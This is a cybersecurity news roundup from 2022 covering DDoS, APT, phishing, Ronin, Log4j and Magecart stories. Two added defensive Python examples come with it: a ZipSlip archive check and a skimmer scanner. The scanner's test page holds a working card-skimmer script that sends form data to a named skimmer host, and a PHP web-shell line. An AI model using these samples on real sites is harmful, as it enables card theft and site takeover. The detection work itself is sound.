
Extended DDoS Attack With 25.3B+ Requests Thwarted


On June 27, 2022, the cybersecurity firm Imperva mitigated a DDoS attack with over 25.3 billion requests. The attack, according to experts, sets a new record for Imperva's application DDoS mitigation solution. The attack, which targeted an unnamed Chinese telecommunications company, was notable for its duration, lasting more than four hours and peaking at 3.9 million RPS. 

“On June 27, 2022, Imperva mitigated a single attack with over 25.3 billion requests, setting a new record for Imperva’s application DDoS mitigation solution” reads the announcement. “While attacks with over one million requests per second (RPS) aren’t new, we’ve previously only seen them last for several seconds to a few minutes. On June 27, Imperva successfully mitigated a strong attack that lasted more than four hours and peaked at 3.9 million RPS.”

The Chinese telecommunications company had previously been targeted by large attacks, and experts added that two days later a new DDoS attack hit its website, albeit for a shorter period of time. This record-breaking attack had an average rate of 1.8 million RPS. To send multiple requests over each individual connection, threat actors used HTTP/2 multiplexing, combining multiple requests into a single connection.

The attackers' technique is difficult to detect and can bring down targets with limited resources.

“Since our automated mitigation solution is guaranteed to block DDoS in under three seconds, we estimate that the attack could have reached a much greater rate than our tracked peak of 3.9 million RPS.” continues Imperva.

This attack was launched by a botnet comprised of nearly 170,000 different IP addresses, including routers, security cameras, and compromised servers. The compromised devices can be found in over 180 countries, with the majority of them in the United States, Indonesia, and Brazil.

Akamai mitigated the largest DDoS attack ever seen against one of its European customers on Monday, September 12, 2022. The malicious traffic peaked at 704.8 Mpps and appears to be the work of the same threat actor behind the previous record, an attack on the same customer that Akamai blocked in July.

Montenegro's State Infrastructure Struck by Cyber Attack, Officials Say

An unprecedented cyber attack on Montenegro's government digital infrastructure occurred, and the government promptly implemented measures to mitigate its impact. Montenegro immediately reported the attack to other NATO members. 

“Certain services were switched off temporarily for security reasons but the security of accounts belonging to citizens and companies and their data have not been jeopardised,” said Public Administration Minister Maras Dukaj. 

The attack, according to the Minister, began on Thursday night. Fearing that the attack would disrupt the government infrastructure used to identify people living in Montenegro, as well as transportation, the US embassy in Montenegro recommended that US citizens limit their movement and travel within the country to necessities and keep their travel documents up to date and easily accessible. The National Security Agency issued a warning to critical infrastructure organisations.

“A persistent and ongoing cyber-attack is in process in Montenegro,” reported the website of the U.S. Embassy in the capital Podgorica. 

“The attack may include disruptions to the public utility, transportation (including border crossings and airport), and telecommunication sectors.” 

EPCG, the state-owned power utility, has switched to manual handling to avoid any potential damage, according to Milutin Djukanovic, president of EPCG. The company decided to temporarily disable some of its clients' services as a safety measure. The government believes the attack was carried out by a nation-state actor.

“Outgoing Prime Minister Dritan Abazovic called a session of the National Security Council for Friday evening to discuss the attack. Abazovic said it was politically motivated following the fall of his government last week,” reported Reuters.

Previous Attacks

Montenegro was targeted by the Russia-linked hacker group APT28 in June 2017 after it officially joined the NATO alliance, amidst strong opposition from the Russian government, which threatened retaliation.

Montenegro experienced massive and prolonged cyberattacks against government and media websites in February 2017, for the second time in a few months. FireEye researchers who analysed the attacks discovered malware and exploits associated with the notorious Russia-linked APT group known as APT28 (aka Fancy Bear, Pawn Storm, Strontium, Sofacy, Sednit, and Tsar Team).

Another massive attack was launched against the country's institutions during the October 2016 elections, sparking speculation that the Russian Government was involved. At the time, hackers launched spear phishing attacks against Montenegro, using weaponized documents related to a NATO secretary meeting and a visit by a European army unit to the country.

The hackers distributed the GAMEFISH backdoor (also known as Sednit, Seduploader, JHUHUGIT, and Sofacy), a malware used only by the APT28 group in previous attacks. Marshal Sir Stuart Peach, Chairman of NATO's Military Committee (MC), announced the Alliance's effort to counter Russian hybrid attacks in January 2020.

The term "hybrid warfare" refers to a military strategy that combines political warfare, irregular warfare, and cyberwarfare with other methods of influencing, such as fake news, diplomacy, lawfare, and foreign electoral intervention.

Researchers Discover Kimsuky Infra Targeting South Korean Politicians and Diplomats

Kimsuky, a North Korean nation-state group, has been linked to a new wave of nefarious activities targeting political and diplomatic entities in its southern counterpart in early 2022. 

The cluster was codenamed GoldDragon by Russian cybersecurity firm Kaspersky, with infection chains resulting in the deployment of Windows malware designed to collect file lists, user keystrokes, and stored web browser login credentials. South Korean university professors, think tank researchers, and government officials are among the potential victims. 

Kimsuky, also known as Black Banshee, Thallium, and Velvet Chollima, is a prolific North Korean advanced persistent threat (APT) group that targets entities globally, but with a primary focus on South Korea, to gather intelligence on various topics of interest to the regime.

The group, which has been active since 2012, has a history of using social engineering tactics, spear-phishing, and watering hole attacks to obtain sensitive information from victims.

Late last month, cybersecurity firm Volexity linked the actor to an intelligence-gathering mission aimed at siphoning email content from Gmail and AOL using Sharpext, a malicious Chrome browser extension.

The latest campaign employs a similar tactic, with the attack sequence initiated by spear-phishing messages containing macro-embedded Microsoft Word documents supposedly comprising content related to geopolitical issues in the region. Alternative initial access routes are also said to use HTML Application (HTA) and Compiled HTML Help (CHM) files as decoys in order to compromise the system.

Whatever method is used, the initial access is followed by a remote server dropping a Visual Basic Script that is orchestrated to fingerprint the machine and retrieve additional payloads, including an executable capable of exfiltrating sensitive information.

The attack is unique in that it sends the victim's email address to the command-and-control (C2) server if the recipient clicks on a link in the email to download additional documents. If the request does not include the expected email address, a harmless document is returned.

To complicate matters even further, the first-stage C2 server forwards the victim's IP address to another VBS server, which compares it to an incoming request generated after the target opens the bait document. The two C2 servers' "victim verification methodology" ensures that the VBScript is distributed only when the IP address checks are successful, indicating a highly targeted approach.

"The Kimsuky group continuously evolves its malware infection schemes and adopts novel techniques to hinder analysis. The main difficulty in tracking this group is that it's tough to acquire a full-infection chain," Kaspersky researcher Seongsu Park concluded.

Researchers: AiTM Attacks Are Targeting Google Workspace Enterprise Users

A large-scale adversary-in-the-middle (AiTM) phishing campaign targeting enterprise users of Microsoft email services has also targeted Google Workspace users. 

"This campaign specifically targeted chief executives and other senior members of various organizations which use [Google Workspace]," Zscaler researchers Sudeep Singh and Jagadeeswar Ramanukolanu detailed in a report published this month.

The AiTM phishing attacks are said to have begun in mid-July 2022, using a similar method to a social engineering campaign designed to steal users' Microsoft credentials and even circumvent multi-factor authentication. 

The low-volume Gmail AiTM phishing campaign also includes the use of compromised emails from CEOs to conduct additional social engineering, with the attacks also utilizing several compromised domains as an intermediate URL redirector to take victims to the final landing page.

Attack chains entail sending password expiry emails to potential targets that contain an embedded malicious link to supposedly "extend your access"; clicking it takes the recipient to Google Ads and Snapchat redirect pages that load the phishing page URL.

Aside from open redirect abuse, a second variant of the attacks uses compromised sites to host a Base64-encoded version of the next-stage redirector in the URL, as well as the victim's email address. This intermediate redirector is a piece of JavaScript code that directs the victim to a Gmail phishing page.

In one case, the redirector page used in the Microsoft AiTM phishing attack on July 11, 2022, was revised to take the user to a Gmail AiTM phishing page, connecting the two campaigns.

"There was also an overlap of infrastructure, and we even identified several cases in which the threat actor switched from Microsoft AiTM phishing to Gmail phishing using the same infrastructure," the researchers said.

Overall, the findings suggest that multi-factor authentication safeguards alone are insufficient to defend against advanced phishing attacks, necessitating that users scrutinize URLs before entering credentials and avoid opening attachments or clicking on links in emails sent from untrusted or unknown sources.

‘Evil PLC’ Could Turn PLCs Into Attack Vectors


When one thinks of someone hacking a programmable logic controller, one usually thinks of the PLC as the end objective of the assault. Adversaries use other systems to get at what will eventually allow them to cause industrial damage. 

However, a Claroty Team 82 DefCon presentation asks the following question: what if someone exploited a PLC as a vector rather than the destination? The researchers argue that the "Evil PLC" attack scenario is novel: infecting every engineer who interfaces with a PLC with malware. 

As proof of concept, Claroty revealed a series of 11 additional vendor-specific vulnerabilities that would allow the attack. These flaws were discovered in the Ovarro TBOX, B&R (ABB) X20 System, Schneider Electric Modicon M340 and M580, GE MarkVIe, Rockwell Micro Control Systems, Emerson PACSystems and Xinje XDPPro platforms. All but the Emerson flaw were issued CVEs. Claroty came up with the notion after trying to learn more about the adversaries that attack their honeypots.

“We asked ourselves, how can we actively attack the attackers? We don't know anything about them. We cannot find them,” said Claroty director of research Sharon Brizinov. “And then we kind of had a eureka moment and we thought, okay, what if the PLC was to be weaponized?”

Claroty used a ZipSlip attack against several vendors (Emerson, Ovarro, B&R, GE, and Xinje), a heap overflow against Schneider, and a deserialization attack against Rockwell to create an Evil PLC. Evil PLC, according to Claroty, would be suited to two attack scenarios. The first scenario would be if the PLC was the only entry point into a secure facility. Waiting for an engineer to connect to the PLC allows the attacker to infect the engineer's workstation. This might be sped up by encouraging an early inspection using the newfound access to the PLC.

“Once the attacker weaponized the PLC, maybe they deliberately cause a fault on the PLC. The engineer would be lured to the PLC to check what's going on with it,” said Brizinov. 

Another possibility is to take advantage of the large number of PLCs maintained by outside professionals. One engineer linked to one PLC could spread malicious code across several enterprises. 

“Usually PLCs are the crown jewel. When we're talking about classic attack vectors in ICS domains we're always seeing the PLC as the endpoint, the end goal; but if we're playing with those ideas and shifting our thoughts a bit, we can get to new ways of how to defend and attack both networks,” Brizinov said. 
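Why the ZipSlip class of bug works against engineering software, and the check that stops it, as an added example that is not Claroty's code nor any vendor's: a constructed in-memory archive (standing in for a project file pulled from a PLC) contains an entry whose name climbs out of the destination directory with '..'; an extractor that simply joins the entry name onto the destination would write elsewhere, while the validating extractor below refuses the whole archive. All archive contents and names are constructed for illustration.

```python
import io
import os
import tempfile
import zipfile


def build_sample_archive(include_traversal: bool) -> bytes:
    """Constructed in-memory archive. The optional entry uses '..' so that a
    naive extractor would write it outside the chosen destination directory
    (the ZipSlip pattern); its contents are an inert text string."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("project/main.xml", "<project/>")
        if include_traversal:
            zf.writestr("../../startup/payload.txt", "constructed sample, inert")
    return buf.getvalue()


def naive_target_path(dest: str, name: str) -> str:
    """What a vulnerable extractor does: join the entry name and trust it."""
    return os.path.normpath(os.path.join(dest, name))


def escaping_entries(archive: bytes, dest: str) -> list:
    """Return entry names whose resolved path lands outside dest. Comparing
    realpaths also catches absolute entry names, which os.path.join would
    otherwise let replace dest entirely."""
    dest_real = os.path.realpath(dest)
    bad = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for name in zf.namelist():
            target = os.path.realpath(os.path.join(dest_real, name))
            if os.path.commonpath([dest_real, target]) != dest_real:
                bad.append(name)
    return bad


def safe_extract(archive: bytes, dest: str) -> list:
    """Validate every entry before writing anything, and refuse the whole
    archive rather than silently skipping the offending entries."""
    bad = escaping_entries(archive, dest)
    if bad:
        raise ValueError(f"refusing archive, path traversal in: {bad}")
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        zf.extractall(dest)  # CPython's own extractall strips '..' too
        return zf.namelist()


def run_demo() -> dict:
    """Run a hostile and a benign archive through the check in a throwaway
    directory and report what happened."""
    hostile = build_sample_archive(include_traversal=True)
    benign = build_sample_archive(include_traversal=False)
    with tempfile.TemporaryDirectory() as dest:
        escaping = escaping_entries(hostile, dest)
        naive = naive_target_path(dest, "../../startup/payload.txt")
        naive_inside = naive.startswith(dest + os.sep)
        try:
            safe_extract(hostile, dest)
            refused = False
        except ValueError:
            refused = True
        extracted = safe_extract(benign, dest)
        written = os.path.isfile(os.path.join(dest, "project", "main.xml"))
    return {"escaping": escaping, "naive_inside": naive_inside,
            "refused": refused, "extracted": extracted, "written": written}


if __name__ == "__main__":
    print(run_demo())
```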

Alert! Large-Scale AiTM Attacks Targeting Enterprise Users

A new large-scale phishing effort has been reported that uses adversary-in-the-middle (AitM) tactics to circumvent security safeguards and attack business email accounts. 

Zscaler researchers Sudeep Singh and Jagadeeswar Ramanukolanu said in a Tuesday report, "It uses an adversary-in-the-middle (AitM) attack technique capable of bypassing multi-factor authentication. The campaign is specifically designed to reach end users in enterprises that use Microsoft's email services." 

Fintech, lending, insurance, energy, manufacturing, and federal credit union verticals are the main targets in the United States, United Kingdom, New Zealand, and Australia. This is not the first time such a phishing attack has been identified. Microsoft revealed this month that over 10,000 businesses had been targeted by AitM tactics to compromise accounts protected by multi-factor authentication (MFA) since September 2021. 

The ongoing campaign, which began in June 2022, starts with an invoice-themed email addressed to targets that includes an HTML file with a phishing URL embedded within it. Opening the attachment in a web browser takes the email recipient to a phishing website posing as a Microsoft Office login page, but not before fingerprinting the visitor's system to assess whether the visitor is the intended target. 

AitM phishing attacks go beyond standard phishing tactics aimed at stealing credentials from unsuspecting users, primarily where MFA is implemented - a security barrier that prevents the attacker from logging into the account using just the stolen credentials. To get around this, the rogue landing page created using a phishing kit acts as a proxy, capturing and relaying all traffic between the client (i.e., the victim) and the email server. 

"The kits intercept the HTML content received from the Microsoft servers, and before relaying it back to the victim, the content is manipulated by the kit in various ways as needed, to make sure the phishing process works," the researchers stated. 

This also includes replacing any links to Microsoft domains with equivalent links to the phishing domain, to guarantee that the back-and-forth with the phoney website continues throughout the session. According to Zscaler, the attacker manually logged into the account eight minutes after the credential theft, reading emails and verifying the user's personal information. 

Furthermore, compromised email inboxes are often used to send further phishing emails as part of the same campaign to conduct business email compromise (BEC) frauds. The researchers noted, "Even though security features such as multi-factor authentication (MFA) add an extra layer of security, they should not be considered as a silver bullet to protect against phishing attacks. With the use of advanced phishing kits (AiTM) and clever evasion techniques, threat actors can bypass both traditional as well as advanced security solutions."

US Government Alerts Americans of Rising SMS Phishing Attacks


The Federal Communications Commission (FCC) has cautioned Americans about an increase in SMS (Short Message Service) phishing attacks aimed at stealing their personal information and money. Such attacks are also known as smishing or robotexts (as the FCC refers to them), and the fraudsters behind them may utilise a variety of enticements to fool you into disclosing sensitive information. 

"The FCC tracks consumer complaints – rather than call or text volume – and complaints about unwanted text messages have risen steadily in recent years from approximately 5,700 in 2019, 14,000 in 2020, 15,300 in 2021, to 8,500 through June 30, 2022," the US communications watchdog's Robocall Response Team said [PDF]. 

"In addition, some independent reports estimate billions of robotexts each month – for example, RoboKiller estimates consumers received over 12 billion robotexts in June." 

Smishing baits reported to the FCC by American customers include statements concerning unpaid bills, package delivery concerns, bank account problems, or law enforcement activities. Links sending users to landing pages imitating bank websites and asking them to authenticate a transaction or unlock frozen credit cards are among the most clever and persuasive baits used in text message phishing attempts. 

Phishing SMS messages may also be spoofed to make it look as though the sender is someone you're more likely to trust, such as the IRS or a company one is familiar with. While some attackers will try to steal financial information, others are less fussy and will collect whatever personal information they can get their hands on to use in later frauds or sell to other bad actors. The FCC suggests the following methods to protect against SMS phishing attacks:
  • Do not respond to texts from unknown numbers or any others that appear suspicious.
  • Never share sensitive personal or financial information by text.
  • Be on the lookout for misspellings or texts that originate with an email address.
  • Think twice before clicking any links in a text message. If a friend sends you a text with a suspicious link that seems out of character, call them to ensure they weren't hacked.
  • If a business sends you a text you weren't expecting, look up their number online and call them back.
  • Remember that government agencies almost never initiate contact by phone or text.
  • Report texting scam attempts to your wireless service provider by forwarding unwanted texts to 7726 (or "SPAM").
"If you think you're the victim of a texting scam, report it immediately to your local law enforcement agency and notify your wireless service provider and financial institutions where you have accounts," the FCC added.

Cyber-attacks on Port of Los Angeles Doubled Since Pandemic


According to recent research, one of the world's biggest ports has witnessed an unusual spike in cyber-attacks since the outbreak began. The Port of Los Angeles' executive director, Gene Seroka, told the BBC World Service over the weekend that the facility receives roughly 40 million attacks every month. 

"Our intelligence shows the threats are coming from Russia and parts of Europe. We have to stay steps ahead of those who want to hurt international commerce. We must take every precaution against potential cyber-incidents, particularly those that could threaten or disrupt the flow of cargo,” he further added. 

Ransomware, malware, spear phishing, and credential harvesting attacks appear to be among the threats aimed at the facility, which is the busiest in the Western Hemisphere. In many cases the goal seems to be harming the US economy, although profit through extortion and data theft will also be a factor. 

Such dangers, if not adequately managed, can potentially exacerbate COVID-era supply chain snarls. Seroka said that port blockages will not be cleared completely until next year, even though the number of container ships waiting more than two days to offload has reportedly reduced from 109 in January to 20 today. 

"The past two years have proven the vital role that ports hold to our nation's critical infrastructure, supply chains and economy. It's paramount we keep the systems as secure as possible," Seroka expressed. 

The challenge is so acute that the port established one of the world's first Cyber Resilience Centers in collaboration with the FBI. It provides a single site for port stakeholders such as shipping corporations to receive, evaluate, and exchange threat intelligence. 

Ports have become a popular target for cyber-criminals, particularly those aiming to undermine operations and extort businesses, because of their strategic significance to global trade.

Alert WordPress Admins! Uninstall the Modern WPBakery Plugin Immediately

WordPress administrators have been cautioned to uninstall a problematic plugin or risk a total site takeover. This threat is associated with a plugin that is no longer in use: Modern WPBakery page builder extensions. CVE-2021-24284 is a vulnerability in the plugin that allows "unauthenticated arbitrary file upload through the 'uploadFontIcon' AJAX action." 

As a result, attackers might upload malicious PHP scripts to the WordPress site, resulting in remote code execution and site takeover. There has been a significant surge in attacks due to this defunct WordPress relic. 

Researchers detected "many vulnerable endpoints" in Modern WPBakery in 2021, which might lead to the injection of malicious JavaScript or even the deletion of arbitrary data. The goal this time is to upload rogue PHP files and then inject malicious JavaScript into the site. 

Approximately 1.6 million sites have been probed by malicious actors for the presence of the plugin, and current estimates imply that 4,000 to 8,000 websites are still hosting it. Check and delete immediately. 

The current recommendation is to search for the plugin and then uninstall it as quickly as possible. It has been entirely abandoned, and no security updates will be released. If anyone has it installed, it's only a matter of time until the exploiters find their way to a website hosting Modern WPBakery and begin collecting information. Remove this out-of-date invitation to site-wide compromise as soon as possible.

Tor Browser 11.5 Adds Censorship Detection & Circumvention

The Tor Project's flagship anonymizing browser has been upgraded to make it simpler for users to avoid government attempts to prohibit its usage in various locations. According to the non-profit organisation that maintains the open source software, Tor Browser 11.5 changes the user experience of connecting to Tor from strongly censored locations. 

It replaces a "manual and confusing procedure" in which users have to maintain their own Tor Network settings to figure out how to utilise a bridge to unblock Tor in their location. Because various bridge settings may be required in different countries, the Tor Project stated that the manual effort placed an undue hardship on restricted users. 

Connection Assist is its answer, and it will automatically apply the bridge configuration that should perform best in a user's exact location. China, Russia, Belarus, and Turkmenistan are among the countries that have blocked the Tor Network. Volunteers from these and other impacted nations are encouraged to apply to be alpha testers so that their feedback may be shared with the community. 

The Tor Project has revised its Tor Network settings to improve the user experience for people who still want to manually configure their software. There is also a new HTTPS-only default option, which protects users by enforcing encrypted communication between their system and the web servers it connects to. 

“This change will help protect our users from SSL stripping attacks by malicious exit relays, and strongly reduces the incentive to spin up exit relays for man-in-the-middle attacks in the first place,” it stated. 

Although the Tor Browser is often associated with illicit dark web browsing, it is also a useful tool for activists, journalists, dissidents, and NGO workers working under harsh government regimes.

Homeland Security Warns of Log4j’s 'Endemic' Threat for Years to Come

This week, the US Department of Homeland Security (DHS) published the Cyber Safety Review Board's (CSRB) first report into the December 2021 Log4j incident, when a variety of vulnerabilities in this Java-based logging framework were revealed. 

The report's methodology comprised 90 days of interviews and information requests with around 80 organisations and individuals, including software developers, end users, security specialists, and businesses. 

This was done to ensure that the board met with a wide range of representatives and understood the complexities of how different attack surfaces are constructed and defended. According to the report, although standardised and reusable "building blocks" are essential for developing and expanding software, they also allow any possible vulnerability to be unknowingly included in multiple software packages, putting any organization that uses those programs at risk. 

According to the report, while Log4j remains dangerous, the government-wide approach helped blunt the vulnerability's impact. The board also noted the need for extra funding to help the open-source software security community, which is primarily comprised of volunteers. 

Industry experts, such as Michael Skelton, senior director of security operations at Bugcrowd, said of Log4J: “Dealing with it is a marathon, one that will take years to resolve. Java and Log4j are prevalent everywhere, not only in core projects but in dependencies that other projects rely on, making detection and mitigation not as simple an exercise as it may be with other vulnerabilities.” 

John Bambenek, the principal threat hunter at Netenrich, was more critical of the report’s timing, believing that “anyone still vulnerable is highly unlikely to read this report or in much of a position to do anything about it if they did. Most of the American economy is small to medium businesses that almost always never have a CISO and likely not even a CIO. Until we find ways to make the public without security budgets safe, no high-level list of best practices will move the ball significantly.” 

The CSRB report went on to state that, thankfully, it is unaware of any large Log4j-based attacks on critical infrastructure assets or systems, and that efforts to hack Log4j happened at a lesser level than many experts expected. 

The paper, however, emphasises that the Log4j incident is "not over" and will remain an "endemic vulnerability" for many years, with considerable risk persisting. The report concluded with 19 actionable recommendations for government and business, divided into four categories. They were as follows:
  • Address Continued Risks of Log4j
  • Drive Existing Best Practices for Security Hygiene
  • Build a Better Software Ecosystem
  • Investments in the Future

Predatory Sparrow's Assault on Iran's Steel Industry


Predatory Sparrow, also known as Gonjeshke Darande, has accepted full responsibility for last month's cyberattacks on various Iranian steel factories and has now posted the first batch of top-secret papers on its Twitter account. 

The group distributed a cache of around 20 terabytes of data. It includes company paperwork revealing the steel plants' links to Iran's strong Islamic Revolutionary Guard Corps. The group stated in a series of tweets in both English and Persian that the cache was only the beginning of what will be disclosed. 

While claiming responsibility for the June 27 attack, the group also posted a photo and video purportedly showing damage to equipment at the state-owned Khouzestan Steel Company, one of Iran's biggest steel manufacturing factories. Although both the steel firm and the Iranian government denied any serious impact, sources suggest that the attack hampered industrial operations. 

The Predatory Sparrow group explained that the attacks were carried out with caution in order to safeguard innocent people. The group also stated that the hacks were in reaction to the Islamic Republic's actions. The group goes on to say that the enterprises were targeted by international sanctions and that they will continue to operate despite the limitations. 

Regardless of Predatory Sparrow's insistence that the attacks are autonomous, it is suspected that the Israeli government is supporting the hacktivist group, given the sophistication of the operation, the nature of the attacks, and the message preceding, during, and after what looks to be an attack. Aside from the steel facilities attack, the Predatory Sparrow group has claimed responsibility for other digital attacks on key Iranian targets, including the one that crippled Iran's state-controlled gasoline distribution in October 2021 and the one that hit the Iranian railway system in August 2021. While the Iranian government continues to deny the group's accusations, each cyber strike raises new concerns.

Hackers Used Fake LinkedIn Job Offer to Steal $625M

Earlier this year, Ronin Network (RON), the blockchain network behind the popular crypto games Axie Infinity and Axie DAO, experienced the greatest crypto attack against a decentralised financial network ever reported. 

The United States issued an advisory in May 2022, stating that highly skilled hackers from North Korea were attempting to get work by posing as IT freelancers. The Axie Infinity attack was socially engineered, with the North Korean government-backed hacker organisation Lazarus getting into Sky Mavis' network by sending one of the company's workers a PDF file carrying malware. Lazarus' participation in such a high-profile breach should come as no surprise. 

In January 2022, analysts from several crypto security organizations concluded that North Korean hackers had stolen $1.3 billion from cryptocurrency exchanges throughout the world, with the famed Lazarus group as their top suspect. 

Axie Infinity Hack 

The employee, an ex-senior engineer at the firm, fell for the trap and opened the PDF, believing it was a high-paying job offer from another company. However, this firm did not exist in reality.

During the recruitment process, the ex-employee disclosed sensitive personal information that attackers utilised to steal from the organisation. Sky Mavis' staff are regularly threatened by sophisticated spear-phishing attempts on multiple social networks, according to the company. In this case, one person, who does not even work at Sky Mavis, was duped. 

How was Ronin hacked? 

According to The Block, at the time of the attack Ronin, Axie Infinity's Ethereum-based proof-of-authority sidechain, had nine validators. 

“The attacker managed to leverage that access to penetrate Sky Mavis IT infrastructure and gain access to the validator nodes,” Sky Mavis stated.

To get access to the company's networks, the attacker needed to seize five out of nine validators. The spyware-laced PDF allowed the attacker to gain control of four validators and get entry to the community-run Axie DAO (Decentralized Autonomous Organization), from which they gained control of the fifth validator. After breaching the network, the attackers took $25 million in USDC stablecoin and 173,600 ether (about $597 million) from Axie Infinity's treasury, totaling $625 million in crypto. 

Since then, the Ronin sidechain has increased the number of validators to 11 to improve security, and Sky Mavis is reimbursing Axie players who lost crypto as a result of the hack. In April 2022, the company raised $150 million in funding. 

The US government attributes the attack to the well-known North Korean hacking group Lazarus, which specialises in this kind of operation; the Treasury named the group when it sanctioned the attacker's wallet address in April 2022. This is hardly Lazarus' first foray into the blockchain sector, and the use of a fake job offer to get inside a company's network is not new either: in June 2020 the Slovak security company ESET documented an elaborate LinkedIn recruiting fraud by Lazarus (Operation In(ter)ception) that targeted military and aerospace companies.

Novel ToddyCat APT Attacking Microsoft Exchange Servers

 

ToddyCat APT has been targeting Microsoft Exchange servers in enterprises throughout Asia and Europe since at least December 2020. 

The ToddyCat APT group stepped up its attacks in February 2021, hunting for unpatched Microsoft Exchange servers it could compromise with ProxyLogon exploits (CVE-2021-26855 and the related flaws). A passive backdoor dubbed Samurai and a new trojan named Ninja were identified while tracking the group's activity. Both give the operators control of the compromised host and are used to move laterally through the network. 

Some of the organisations the group compromised, in three separate countries, were hacked at the same time by other China-linked actors using the FunnyDream backdoor. The targets are high-profile organisations in the government and military sectors, and the group appears focused on objectives tied to geopolitical interests. 

Numerous waves of attacks 

The first wave of attacks ran from December 2020 to February 2021, when the group targeted only a handful of government entities in Vietnam and Taiwan. The second wave, between February and May 2021, broadened to organisations in a range of countries, including Iran, Russia, India, and the United Kingdom. 

In the following phase, which lasted through February 2022, the group targeted the same set of countries as well as organisations in Uzbekistan, Kyrgyzstan, and Indonesia. ToddyCat has shown a sustained interest in the government and military sectors and is expected to continue operating. 

Organisations should use threat intelligence services to stay current on emerging threats and should feed the indicators of compromise published with the research into their detection tooling. Since the group's way in is ProxyLogon, an unpatched Exchange server exposed to the Internet is the gap to close first.

Newly Detected Magecart Infrastructure Discloses the Scale of Ongoing Campaign

 

A recently discovered Magecart skimming campaign has its origins in an earlier attack activity dating back to November 2021. 

Specifically, Malwarebytes revealed in an analysis published on Tuesday that two malicious domains found hosting credit card skimmer code, "scanalytic[.]org" and "js.staticounter[.]net", are part of a larger infrastructure used to carry out the attacks. 

Jérôme Segura stated, "We were able to connect these two domains with a previous campaign from November 2021 which was the first instance to our knowledge of a skimmer checking for the use of virtual machines. However, both of them are now devoid of VM detection code. It's unclear why the threat actors removed it, unless perhaps it caused more issues than benefits." 

Other domains tied to the same infrastructure put the earliest sign of campaign activity at May 2020. Magecart is an umbrella term for dozens of cybercrime subgroups that specialise in digital credit card fraud carried out by injecting JavaScript code into e-commerce sites, typically on checkout pages. 

Operators gain access to websites either directly or through third-party firms that supply software to the targeted sites. While the attacks first drew attention in 2015 for targeting the Magento e-commerce platform (the name Magecart combines "Magento" and "shopping cart"), they have since spread to other platforms, including the WordPress e-commerce plugin WooCommerce. 

According to a Sucuri study published in April 2022, WordPress overtook Magento in July 2021 as the CMS platform most often hit by credit card skimming malware, with skimmers hidden in sites as fake image files and innocuous-looking JavaScript theme files. 
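Two checks a site owner can run against the techniques described above, written for this page as an added example (not Malwarebytes or Sucuri tooling): a checkout-page scan that flags script sources not on a first-party allowlist, the two skimmer hosts named in the report, and inline code that both reads form fields and sends data out; and a file check that catches "images" that are really PHP or JavaScript. The sample page, the hypothetical first-party host shop.example and the fake logo.png are constructed for the example.

```python
import re
from html.parser import HTMLParser
from typing import List, Set, Tuple
from urllib.parse import urlparse

# Skimmer hosts named in the Malwarebytes report (written defanged on the page).
KNOWN_SKIMMER_HOSTS = {"scanalytic.org", "js.staticounter.net"}

# Heuristics for inline skimmer code: it reads form fields and sends them away.
HARVEST = re.compile(
    r"document\.forms|querySelectorAll\(\s*['\"]input|getElementsByTagName\(\s*['\"]input", re.I)
EXFIL = re.compile(r"XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\s*\(|\.src\s*=", re.I)

IMAGE_MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self) -> None:
        super().__init__()
        self.external: List[str] = []
        self.inline: List[str] = []
        self._in_script = False
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self._buf = []

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            body = "".join(self._buf).strip()
            if body:
                self.inline.append(body)
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def scan_checkout_page(html: str, first_party_hosts: Set[str]) -> List[Tuple[str, str]]:
    """Return (kind, detail) findings: 'ioc' for a known skimmer host,
    'third-party' for a script host not on the allowlist, 'skimmer-like' for
    inline code that harvests fields and exfiltrates them."""
    collector = ScriptCollector()
    collector.feed(html)
    findings: List[Tuple[str, str]] = []
    for src in collector.external:
        host = (urlparse(src).hostname or "").lower()  # relative src -> first party
        if host in KNOWN_SKIMMER_HOSTS:
            findings.append(("ioc", src))
        elif host and host not in first_party_hosts:
            findings.append(("third-party", src))
    for code in collector.inline:
        for host in KNOWN_SKIMMER_HOSTS:
            if host in code:
                findings.append(("ioc", f"inline script references {host}"))
        if HARVEST.search(code) and EXFIL.search(code):
            findings.append(("skimmer-like", "inline script reads form fields and sends them out"))
    return findings


def check_image_file(name: str, data: bytes) -> List[str]:
    """Flag 'images' that are really code: wrong magic bytes, or PHP/JS inside."""
    problems = []
    ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
    magics = IMAGE_MAGIC.get(ext)
    if magics and not data.startswith(magics):
        problems.append(f"{name}: extension says image but header is not {ext}")
    if b"<?php" in data:
        problems.append(f"{name}: contains a PHP open tag")
    if re.search(rb"<script\b", data, re.I):
        problems.append(f"{name}: contains a <script> tag")
    return problems


# Constructed checkout page: one first-party script, one known skimmer host,
# one unknown third party, and an inline skimmer posting to the skimmer host.
SAMPLE_PAGE = """
<html><body>
<form id="checkout"><input name="cc_number"><input name="cvv"></form>
<script src="/static/checkout.js"></script>
<script src="https://js.staticounter.net/counter.js"></script>
<script src="https://cdn.analytics-vendor.example/tag.js"></script>
<script>
var f=document.forms[0],d='';
for(var i=0;i<f.elements.length;i++){d+=f.elements[i].name+'='+f.elements[i].value+'&';}
var x=new XMLHttpRequest();x.open('POST','https://js.staticounter.net/c');x.send(btoa(d));
</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in scan_checkout_page(SAMPLE_PAGE, {"shop.example"}):
        print(kind, detail)
    fake_png = b"<?php eval(base64_decode($_POST['x'])); ?>"  # constructed, not real malware
    print(check_image_file("wp-content/themes/shop/logo.png", fake_png))
```

A "third-party" finding is not proof of compromise, but on a checkout page every script host should be one you chose; anything else deserves a look, and a match on a known skimmer host should be treated as an incident.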

